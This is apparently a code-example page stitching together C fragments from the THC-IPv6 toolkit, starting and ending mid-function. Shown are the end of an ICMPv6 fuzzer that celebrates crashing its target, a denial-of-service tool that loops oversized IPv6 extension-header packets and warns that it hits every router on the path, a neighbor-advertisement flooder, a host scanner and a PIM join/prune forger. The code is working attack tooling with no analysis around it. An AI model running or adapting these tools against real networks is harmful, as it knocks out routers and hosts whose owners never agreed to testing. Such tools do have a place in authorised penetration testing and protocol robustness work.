    i += 7; // + null byte
    // = 32 == 126
    
    // flag extension option
    buf[i++] = 26;
    buf[i++] = 1;
    buf[i++] = 0x08;
    i += 5;

    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_icmp6ra);
    break;

  case DO_MLD_QUERY:
  case DO_MLD_DONE:
  case DO_MLD_REP:
    buf[0] = 0xff;
    buf[1] = 0x02;
    buf[15] = 0x05;
    if (someaddr6 != NULL)
      memcpy(buf, someaddr6, 16);
    if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, wait, buf, 16, 0) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_icmp6mld);
    break;
  case DO_MLD2_QUERY:
    buf[0] = 0xff;
    buf[1] = 0x02;
    buf[15] = 0x05;
    if (someaddr6 != NULL)
      memcpy(buf, someaddr6, 16);
    buf[16] = 7;
    buf[17] = 120;
    buf[19] = 3;
    memcpy(buf + 20, dst6, 16);
    memcpy(buf + 36, buf, 16);
    if (thc_add_icmp6(pkt, &pkt_len, DO_MLD_QUERY, 0, wait, buf, 68, 0) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_icmp6mld2que);
    break;
  case DO_MLD2_REPORT:
    for (i = 0; i < 3; i++) {
      buf[0 + 68 * i] = 1 + i * 2 - i / 2;      //include new++, generates 1, 3 and 4
      buf[3 + 68 * i] = 3;      //3 sources
      buf[4 + 68 * i] = 0xff;
      buf[5 + 68 * i] = 0x02;
      buf[18 + 68 * i] = 0x82 + i % 256;
      buf[19 + 68 * i] = 0xff;
      memcpy(buf + 20 + 68 * i, src6, 16);
      buf[36 + 68 * i] = 0xfe;
      buf[37 + 68 * i] = 0x80;
      buf[46 + 68 * i] = 0xf0;
      if (someaddr6 != NULL)
        memcpy(buf + 52 + 68 * i, someaddr6, 16);
    }

    if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, 3, buf, 208, 0) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_icmp6mld2rep);
    break;

  default:
    fprintf(stderr, "ERROR: Mode not implemented yet!\n");
    exit(-1);
  }

  if (thc_generate_pkt(interface, srcmac, mac, pkt, &pkt_len) < 0)
    return -1;
  hdr = (thc_ipv6_hdr *) pkt;

  if (jumbo) {
    i = 0;
    j = 1;
    while (i < hdr->pkt_len + 4 && j) {
      if (hdr->pkt[i] == 'J')
        if (memcmp(&hdr->pkt[i], "JJJJ", 4) == 0)
          j = 0;
      i++;
    }
    if (j) {
      fprintf(stderr, "ERROR: fuckup, cant find my own marker?!\n");
      exit(-1);
    } else
      i--;
    hdr->pkt[i] = 0;
    hdr->pkt[i + 1] = 0;
    hdr->pkt[i + 2] = hdr->pkt[4 + off2];
    hdr->pkt[i + 3] = hdr->pkt[5 + off2];
    hdr->pkt[4 + off2] = 0;
    hdr->pkt[5 + off2] = 0;
  }

  if (extend)
    for (i = 0; i < strlen(fuzzbuf); i++)
      if (fuzzbuf[i] == 'B' || fuzzbuf[i] == 'F')
        fuzzbuf[i] = 'X';

  // backup of generated packet
  pkt_bak = malloc(hdr->pkt_len);
  memcpy(pkt_bak, hdr->pkt, hdr->pkt_len);

  printf("Fuzzing packet, starting at fuzz case %d, ending at fuzz case %d, every packet sent denoted by a dot:\n", test_start, test_end);
//printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf);
  while (do_fuzz) {
    if (test_cnt == 0)
      while (fuzzbuf[test_ptr] == '.') {
        test_ptr++;
        test_pos++;
      }

    if (fuzzbuf[test_ptr] == 0)
      do_fuzz = 0;

    test_cnt++;
    do_it = 1;

//printf("[%s] pos[%d]=%c -> %d | pkt[%d] | %d (%d=>%d)| ", /*fuzzbuf*/"", test_ptr, fuzzbuf[test_ptr], test_cnt, test_pos, test_current, test_start, test_end);
    switch (fuzzbuf[test_ptr]) {
    case 0:
      break;
    case 'X':
      if (test_cnt <= COUNT_EXTEND) {
        if (pkt_bak[test_pos] != extends[test_cnt - 1])
          hdr->pkt[test_pos] = extends[test_cnt - 1];
        else
          do_it = 0;
      } else {
        test_cnt = 0;
        test_ptr++;
        test_pos++;
      }
      break;
    case 'B':
      if (test_cnt <= COUNT_BYTE) {
        if (pkt_bak[test_pos] != bytes[test_cnt - 1])
          hdr->pkt[test_pos] = bytes[test_cnt - 1];
        else
          do_it = 0;
      } else {
        i = 0;
        while (i < COUNT_BYTE && do_it) {
          if (bytes[i] == pkt_bak[test_pos])
            do_it = 0;
          i++;
        }
        if (do_it)
          hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1];
      }
      if (test_cnt == COUNT_BYTE + COUNT_XOR) {
        test_cnt = 0;
        test_ptr++;
        test_pos++;
      }
      break;
    case 'F':
      if (test_cnt <= COUNT_FLAG) {
        if (pkt_bak[test_pos] != flags[test_cnt - 1])
          hdr->pkt[test_pos] = flags[test_cnt - 1];
        else
          do_it = 0;
      } else {
        i = 0;
        while (i < COUNT_FLAG && do_it) {
          if (bytes[i] == pkt_bak[test_pos])    // yes, bytes[] is the right one even for flags
            do_it = 0;
          i++;
        }
        if (do_it)
          hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1];
      }
      if (test_cnt == COUNT_FLAG + COUNT_XOR) {
        test_cnt = 0;
        test_ptr++;
        test_pos++;
      }
      break;
    case 'W':
      sip = (unsigned short int *) &pkt_bak[test_pos];
      if (test_cnt <= COUNT_WORD) {
        if (*sip != words[test_cnt - 1])
          memcpy((char *) &hdr->pkt[test_pos], (char *) &words[test_cnt - 1] + _TAKE2, 2);
        else
          do_it = 0;
      } else {
        i = 0;
        while (i < COUNT_WORD && do_it) {
          if (words[i] == *sip)
            do_it = 0;
          i++;
        }
        if (do_it) {
          i = *sip ^ xors[test_cnt - COUNT_WORD - 1];
          sip = (unsigned short int *) &hdr->pkt[test_pos];
          *sip = i % 65536;
        }
      }
      if (test_cnt == COUNT_WORD + COUNT_XOR) {
        test_cnt = 0;
        test_ptr++;
        test_pos += 2;
      }
      break;
    default:
      fprintf(stderr, "This character should not be in the fuzz string, shoot the programmer: %c(%d) position %d string %s\n", fuzzbuf[test_ptr], fuzzbuf[test_ptr], test_ptr,
              fuzzbuf);
      exit(-1);
      break;
    }

    if (do_it && do_fuzz) {
      if (test_current >= test_start && test_current <= test_end && do_fuzz) {
        // fill icmp id+seq and unique buffer with test case number
        if (fragment)
          memcpy(hdr->pkt + frag_offset + 58, (char *) &test_current + _TAKE4, 4);
        switch (do_type) {
        case DO_NONE:
          // empty
          break;
        case DO_PING:
          for (i = 0; i < 4 + 1; i++)
            memcpy(hdr->pkt + offset + 58 + i * 4, (char *) &test_current + _TAKE4, 4);
          break;
        case DO_TCP:
          memcpy(hdr->pkt + offset + 58, (char *) &test_current + _TAKE4, 4);
          break;
        case DO_NEIGHSOL:
        case DO_NEIGHADV:
          break;                // do nothing for these
        case DO_NODEQUERY:
          memcpy(hdr->pkt + offset + 66, (char *) &test_current + _TAKE4, 4);
          break;
        case DO_RA:
          memcpy(hdr->pkt + offset + 0x62, (char *) &test_current + _TAKE4, 4);  // prefix update
          memcpy(hdr->pkt + offset + 0x7e, hdr->pkt + offset + 0x5e, 16);       // routing update
          memcpy(hdr->pkt + 8, (char *) &test_current + _TAKE4, 4);    // srcmac update
          memcpy(hdr->pkt + offset + 0x72, (char *) &test_current + _TAKE4, 4);  // srcmac update
          memcpy(hdr->pkt + 0x10 + off2, (char *) &test_current + _TAKE4, 4);       // srcip update
          memcpy(hdr->original_src, hdr->pkt + 8 + off2, 16);      // srcip update for checksum
          break;
        case DO_MLD_QUERY:
        case DO_MLD_DONE:
        case DO_MLD_REP:
        case DO_MLD2_QUERY:
          memcpy(hdr->pkt + offset + 0x4a, (char *) &test_current + _TAKE4, 4);
          break;
        case DO_MLD2_REPORT:   //??? XXX TODO CHECK
          memcpy(hdr->pkt + offset + 0x4d, (char *) &test_current + _TAKE4, 4);
          memcpy(hdr->pkt + offset + 0x4d + 68, (char *) &test_current + _TAKE4, 4);
          memcpy(hdr->pkt + offset + 0x4d + 136, (char *) &test_current + _TAKE4, 4);
          break;
        default:
          fprintf(stderr, "ERROR!!!\n");
          exit(-1);
        }

        // regenerate checksum
        if (do_type != DO_TCP && do_type != DO_NONE) {       // maybe for later non-icmp stuff
          hdr->pkt[offset + 56] = 0;
          hdr->pkt[offset + 57] = 0;
          i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_ICMP6, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54);
          hdr->pkt[offset + 56] = i / 256;
          hdr->pkt[offset + 57] = i % 256;
        } else { // TCP
          hdr->pkt[offset + 70] = 0;
          hdr->pkt[offset + 71] = 0;
          i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_TCP, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54);
          hdr->pkt[offset + 70] = i / 256;
          hdr->pkt[offset + 71] = i % 256;
        }
        // send packet
        for (k = 0; k < no_send; k++) {
          while(thc_send_pkt(interface, pkt, &pkt_len) < 0)
            usleep(1);
        }
        printf(".");
        usleep(250);
        // if ping, check ping again
        if ((test_current - test_start) % ping == 0 && test_current != 0 && test_start != test_current)
          if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) {
            i = ((((test_current - test_start) / ping) - 1) * ping) + test_start + 1;
            printf("\nResult: target %s crashed during fuzzing, offending test case no. could be %d to %d\n", argv[optind + 1], i < 0 ? 0 : i, test_current);
            exit(1);
          }
      }
//else printf("NOT SENT - NOT IN TEST LIST\n");
      // reset to basic packet
      memcpy(hdr->pkt, pkt_bak, hdr->pkt_len);
      test_current++;
    }
//else printf("NOT SENT!\n");
  }

  printf("\n");
  // ping afterwards to check if it worked
  if (do_alive) {
    if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) {
      printf("Result: target %s is NOT alive via direct ping6 - good work! (position: %d)\n", argv[optind + 1], test_pos);
      exit(1);
    } else
      printf("Result: target %s is still alive via direct ping6, better luck next time.\n", argv[optind + 1]);
  }

  thc_pcap_close(p);
  return 0;
}
예제 #7
0
int main(int argc, char *argv[]) {
  int test = 0, count = 1, tmplen;
  unsigned char buf[65536], bla[1500], tests[256];
  unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
  unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
  thc_ipv6_hdr *hdr;
  int i, j, k, srcmtu, fragsize;
  unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
  int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
  char *interface, *randptr = NULL;
  thc_ipv6_hdr *ipv6;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  interface = argv[1];
  if ((dst6 = thc_resolve6(argv[2])) == NULL) {
    fprintf(stderr, "Error: invalid target: %s\n", argv[2]);
    exit(-1);
  }
  //route6 = thc_resolve6("2a01::");
  memcpy(ldst6, dst6, 16);
  memset(ldst6 + 2, 0, 6);
  ldst6[0] = 0xfe;
  ldst6[1] = 0x80;
  mcast6 = thc_resolve6("ff02::1");
  if (argc >= 4)
    test = atoi(argv[3]);
  memset(null_buffer, 0, sizeof(null_buffer));

  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
    fprintf(stderr, "Error: invalid interface: %s\n", interface);
    exit(-1);
  }
  srcmac = thc_get_own_mac(interface);
  if (rawmode == 0) {
    if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
      fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
      exit(-1);
    }
  } else
    dstmac = null_buffer;
  if ((srcmtu = thc_get_mtu(interface)) <= 0) {
    fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
    exit(-1);
  }
  fragsize = ((srcmtu - 62) / 8) * 8;

  setvbuf(stdout, NULL, _IONBF, 0);
  memset(buf, 0, sizeof(buf));
  memset(tests, 0, sizeof(tests));
  memset(bla, 0, sizeof(bla));

  if (test < 1 || test > MAX_TEST) {
    printf("%s %s (c) 2014 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE);
    printf("Syntax: %s interface destination test-case-number\n\n", argv[0]);
    printf("The following test cases are currently implemented:\n");
    printf("  1 : large hop-by-hop header with router-alert and filled with unknown options\n");
    printf("  2 : large destination header filled with unknown options\n");
    printf("  3 : hop-by-hop header with router alert option plus 180 headers\n");
    printf("  4 : hop-by-hop header with router alert option plus 178 headers + ping\n");
    printf("  5 : AH header + ping\n");
    printf("  6 : first fragments of a ping with a hop-by-hop header with router alert\n");
    printf("  7 : large hop-by-hop header filled with unknown options (no router alert)\n");
    exit(0);
  }

  printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]);
  printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n");

  /********************** TEST CASE PREPARATION *************************/

  if (test == count) {          // 1432
    printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 5;
    buf[1] = 2;
    j = 4;
    i = 1;
    while (i <= 67) {
      k = (i % 63) + 1;
      buf[j] = k;
      switch (k) {
      case 38:                 // quickstart
        buf[j + 1] = 7;         // length
        buf[j + 2] = 1;         // request type + rate
        buf[j + 3] = 60;        //qs-ttl
        buf[j + 4] = 8;         // nonce
        j += 9;
        break;
      case 4:
        buf[j + 1] = 1;
        j += 3;
        break;
      case 0:
      case 5:
        buf[j] = 1;
        // fall through
      default:
        buf[j + 1] = 4;
        j += 6;
      }
//      j += buf[j + 1] + 2;
      i++;
    }
//    for (i = 1; i < 236; i++) {
//      buf[i * 6 - 2] = (i % 63) + 1;
//      buf[i * 6 - 1] = 4;
//    }
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {          // 1432
    printf("Test %d: large destination header filled with unknown options.\n", count);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    for (i = 1; i < 237; i++) {
      buf[6 + i * 6] = (i % 63) + 1;
      buf[5 + i * 6] = 4;
    }
    if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {
    j = (thc_get_mtu(interface) - 48) / 8;
    if (j < 150 || j > 8000) {
      fprintf(stderr, "Error: invalid MTU on interface\n");
      exit(-1);
    }
    printf("Test %d: hop-by-hop header with router alert option plus %d headers.\n", count, j);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 5;
    buf[1] = 2;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
      return -1;
    memset(buf, 0, 2);
    for (i = 0; i < j; i++)
      if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0)
        return -1;
//    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {
    j = (thc_get_mtu(interface) - 64) / 8;
    if (j < 150 || j > 8000) {
      fprintf(stderr, "Error: invalid MTU on interface\n");
      exit(-1);
    }
    printf("Test %d: hop-by-hop header with router alert option plus %d headers plus ping.\n", count, j);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 5;
    buf[1] = 2;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
      return -1;
    memset(buf, 0, 2);
    for (i = 0; i < j; i++)
      if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0)
        return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {
    printf("Test %d: AH header plus ping.\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6 + 8) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    ipv6 = (thc_ipv6_hdr *) pkt;
    if (do_hdr_size != 0)
      ipv6->pkt[do_hdr_size + 40 + 1] = 2;
    else
      ipv6->pkt[14 + 40 + 1] = 2;
  }
  count++;

  if (test == count) {
    printf("Test %d: first ping fragment with hop-by-hop and router alert.\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    buf[0] = 5;
    buf[1] = 2;
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0)
      return -1;
    if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, 0xfacebabe + getpid() + count))
      return -1;
    buf[0] = ICMP6_MLD_REPORT;
    buf[1] = 0;
    buf[2] = 0xb0;
    buf[3] = 0x0b;
    if (thc_add_data6(pkt, &pkt_len, NXT_ICMP6, buf, 14))
      return -1;
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    ipv6 = (thc_ipv6_hdr *) pkt;
    if (do_hdr_size != 0)
      randptr = ipv6->pkt + do_hdr_size + 40 + 8 + 4;
    else
      randptr = ipv6->pkt + 14 + 40 + 8 + 4;
  }
  count++;

  if (test == count) {          // 1432
    printf("Test %d: large hop-by-hop header with filled with unknown options (no router alert).\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    j = 0;
    i = 1;
    while (i <= 67) {
      k = (i % 63) + 1;
      buf[j] = k;
      switch (k) {
      case 38:                 // quickstart
        buf[j + 1] = 7;         // length
        buf[j + 2] = 1;         // request type + rate
        buf[j + 3] = 60;        //qs-ttl
        buf[j + 4] = 8;         // nonce
        j += 9;
        break;
      case 4:
        buf[j + 1] = 1;
        j += 3;
        break;
      case 0:
      case 5:
        buf[j] = 1;
        // fall through
      default:
        buf[j + 1] = 4;
        j += 6;
      }
//      j += buf[j + 1] + 2;
      i++;
    }
//    for (i = 1; i < 236; i++) {
//      buf[i * 6 - 2] = (i % 63) + 1;
//      buf[i * 6 - 1] = 4;
//    }
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;


  if (test == count) { // dummy entry
    // code
    fprintf(stderr, "to implement\n");
    exit(-1);
  }
  count++;


  /******************* END OF TESTCASE PREPARATION **************************/

  count = 0;
  while (1) {
    thc_send_pkt(interface, pkt, &pkt_len);
    usleep(1);
    count++;
    if (randptr != NULL)
      memcpy(randptr, (char*)&count + _TAKE4, 4);
    if (count % 1000 == 0)
      printf(".");
  }

  return 0;
}
예제 #8
0
int main(int argc, char *argv[]) {
  char *interface, mac[6] = "";
  unsigned char *mac6 = mac, *ip6;
  unsigned char buf[24], srcmac[8] = "", *smac = NULL;
  unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst);
  int i;
  unsigned char *pkt = NULL;
  int pkt_len = 0, flags, rawmode = 0, count = 0, prefer = PREFER_LINK, keepmac = 0;

  if (argc > 2 && strncmp(argv[1], "-k", 2) == 0) {
    keepmac = 1;
    if ((smac = thc_get_own_mac(argv[2])) == NULL) {
      fprintf(stderr, "Error: invalid interface %s\n", argv[2]);
      exit(-1);
    }
    argv++;
    argc--;
  }
  if (argc > 2 && strncmp(argv[1], "-m", 2) == 0) {
    sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3],
           (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]);
    smac = srcmac;
    argv+=2;
    argc-=2;
  }
  if (smac != NULL)
    mac6 = smac;

  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);

  interface = argv[1];
  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  if (argc == 3) {
    if ((dst = thc_resolve6(argv[2])) == NULL) {
      fprintf(stderr, "Error: invalid target IPv6 address\n");
      exit(-1);
    } else {
      dstmac = thc_get_mac(interface, NULL, dst);
  }
    if (dst[0] >= 0x20 && dst[0] <= 0xfd)
      prefer = PREFER_GLOBAL;
  }

  ip6 = thc_get_own_ipv6(interface, dst, prefer);

  mac[0] = 0x00;
  mac[1] = 0x18;
  memset(ip6 + 8, 0, 8);
  ip6[8] = 0x02;
  ip6[9] = mac[1];
  ip6[11] = 0xff;
  ip6[12] = 0xfe;
  memset(buf, 0, sizeof(buf));
  buf[16] = 2;
  buf[17] = 1;
  buf[18] = mac[0];
  buf[19] = mac[1];
  memcpy(buf, ip6, 16);
  flags = ICMP6_NEIGHBORADV_OVERRIDE;

  printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
  while (1) {

    for (i = 2; i < 6; i++)
      mac[i] = rand() % 256;

//    ip6[9] = mac[1];
    ip6[10] = mac[2];
    ip6[13] = mac[3];
    ip6[14] = mac[4];
    ip6[15] = mac[5];

    count++;
    memcpy(buf + 10, ip6 + 10, 6);
    memcpy(&buf[20], mac + 2, 4);

    if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0)
      return -1;
    if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
//      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
//      perror("");
//      return -1;
      printf("!");
    }

    pkt = thc_destroy_packet(pkt);
//    usleep(1);
    if (count % 1000 == 0)
      printf(".");
  }
  return 0;
}
예제 #9
0
파일: host_scan.c 프로젝트: 0x0mar/thc-ipv6
/**
  Função principal que realiza o host scan IPv6 na rede
 */
int hostScan(int rawmode,       // informa se o "raw mode" foi ativado ou nao
             char *interface,   // nome da interface de analise
             unsigned char *multicast6, // endereco do grupo multicast de destino
             unsigned char *router6,    // roteador da rota parametrizada
             unsigned char **routers) {
  unsigned char *src6 = NULL,   // endereco ip6 do host [que realiza o scan]
    *mac = NULL,                // endereco MAC do host [que realiza o scan]
    string[64] = "ip6 and dst ";        // Mascara de captura de pacotes [apenas 1pv6 e destino a ser marcado]
  time_t passed;                // timestamp do inicio do scan
  pcap_t *p;                    // contexto pcap de captura

  // obtendo seu proprio endereco ip6
  src6 = thc_get_own_ipv6(interface, multicast6, PREFER_GLOBAL);

  // se estiver operando em "raw mode" deve-se resolver seu proprio endereco MAC
  if (rawmode == 0 && (mac = thc_get_mac(interface, src6, multicast6)) == NULL) {
    fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", thc_ipv62string(src6));
    exit(-1);
  }
  // setar o endereco do host para a filtragem de pacotes recebidos
  strcat(string, thc_string2notation(thc_ipv62string(src6)));

  // make the sending buffer unique
  memset(buf, 'A', sizeof(buf));        // Preenche o buffer com o caractere 'A'
  time((time_t *) & buf[2]);    // coloca da 3a posicao do buffer o tempo em segundos [padrao]
  buf[10] = getpid() % 256;     // coloca o valor do process id ..
  buf[11] = getpid() / 256;     // .. nas posicoes 11 e 12 do buffer
  memcpy(&buf[12], multicast6, 4);      // coloca o endereco de multicast na 13a posicao do buffer

  // inicializa a interface de captura de pacotes com o filtro criado
  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }
  // Envio do 1o pacote : Echo Request Comum
  sendEchoRequest(interface, multicast6, src6, router6, routers, buf, mac, NULL);

  // Envio do 2o pacote : Echo Request Com falha de Opções 
  sendEchoRequestOptions(interface, multicast6, src6, router6, routers, buf, mac);

  // altera os dados do buffer ???
  buf[0] = NXT_INVALID;
  buf[1] = 1;

  // Envio do 3o pacote : Echo Request Com dados Hop by Hop
  sendEchoRequestHopByHop(interface, multicast6, src6, router6, routers, buf, mac);

  // ???
  while (thc_pcap_check(p, (char *) check_packets, NULL) > 0 && (alive_no == 0 || *multicast6 == 0xff));

  // Anota o tempo de inicio
  passed = time(NULL);
  // enquanto nao se passam 5 segundos
  while (passed + 5 >= time(NULL) && (alive_no == 0 || *multicast6 == 0xff))
    thc_pcap_check(p, (char *) check_packets, NULL);  // verifica os pacotes capturados

  // fecha a interface de captura
  thc_pcap_close(p);

  // informa o numero de hosts ativos encontrados
  //printf("Found %d systems alive\n", alive_no);
  printf("\n");
  printAliveSystems();
}
예제 #10
0
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL, buf[100];
  unsigned char *dst6 = NULL, *src6 = NULL, *multicast6, *target6, *neighbor6;
  int pkt1_len = 0, i = 0;
  char *interface;
  int ttl = 1, mode = -1, len = 0;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "t:s:d:")) >= 0) {
    switch (i) {
      case 't':
        ttl = atoi(optarg);
        break;
      case 's':
        src6 = thc_resolve6(optarg);
        break;
      case 'd':
        dst6 = thc_resolve6(optarg);
        break;
      default:
        fprintf(stderr, "Error: invalid option %c\n", i);
        exit(-1);
    }
  }

  interface = argv[optind];
  if (strncasecmp(argv[optind + 1], "hello", 3) == 0)
    mode = 0;
  if (strncasecmp(argv[optind + 1], "join", 3) == 0)
    mode = 1;
  if (strncasecmp(argv[optind + 1], "prune", 3) == 0) {
    mode = 2;
  }
  if (mode == -1) {
    fprintf(stderr, "Error: no mode defined, specify hello, join or prune\n");
    exit(-1);
  }
  if (mode != 0) {
    if (argc - optind != 5) {
      fprintf(stderr, "Error: join/prune mode need a multicast and target address\n");
      exit(-1);
    }
    neighbor6 = thc_resolve6(argv[optind + 2]);
    multicast6 = thc_resolve6(argv[optind + 3]);
    target6 = thc_resolve6(argv[optind + 4]);
    if (multicast6 == NULL || target6 == NULL || neighbor6 == NULL) {
      fprintf(stderr, "Error: unable to resolve addresses\n");
      exit(-1);
    }
  }

  if (dst6 == NULL)
    dst6 = thc_resolve6("ff02::d");
    
  if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }

  if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL)
    return -1;
  memset(buf, 0, sizeof(buf));

  // here we set buf and len
  switch(mode) {
    case 0:
      buf[1] = 1;
      buf[3] = 2;
      buf[5] = 255;
      buf[7] = 19;
      buf[9] = 4;
      if (argc - optind >= 3) {
        i = atoi(argv[optind + 2]); 
        buf[10] = i / 256*256*256;
        buf[11] = (i / 65536) % 256;
        buf[12] = (i % 65536) / 256;
        buf[13] = i % 256;
      }
      len = 14;
      break;
    default:
      buf[0] = 2;
      memcpy(buf + 2, neighbor6, 16);
      buf[19] = 1;
      buf[21] = 255;
      buf[22] = 2;
      buf[25] = 128;
      memcpy(buf + 26, multicast6, 16);
      if (mode == 1)
        buf[43] = 1;
      else
        buf[45] = 1;
      buf[46] = 2;
      buf[48] = 7;
      buf[49] = 128;
      memcpy(buf + 50, target6, 16);
      len = 66;
      mode = 3;
  }

